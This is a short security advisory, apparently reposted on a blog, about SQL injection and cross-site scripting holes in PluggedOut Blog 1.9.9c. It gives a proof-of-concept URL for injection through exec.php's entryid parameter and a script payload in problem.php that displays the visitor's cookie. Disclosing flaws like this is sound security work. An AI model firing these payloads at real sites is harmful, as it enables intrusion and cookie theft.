PluggedOut Blog SQL INJECTION and XSS
PluggedOut Blog is an open source script you can run on your web server to give
you an online multi-user journal or diary.
It can be used equally well for any kind of calendar application.Rather than
give you a thousand things you don't really want ...
PluggedOut Blog : http://www.pluggedout.com/
Credit:
The information has been provided by Hamid Ebadi (Hamid Network Security Team):
admin@hamid.ir
The original article can be found at:
http://hamid.ir/security/
Vulnerable Systems:
PluggedOut Blog Version : Version: 1.9.9c (2006-01-13)
example :
The following URL can be used to trigger an SQL injection vulnerability in the exec.php:
http://[PluggedOut Blog]/exec.php?action=comment_add&entryid=[SQL INJECTION]
and XSS
http://[PluggedOut Blog]/problem.php?id=1&data=>script<alert
('Hamid Network Security Team --> http://hamid.ir');alert(document.cookie)>/script<
# posted by WebFanatic @ 4:37 AM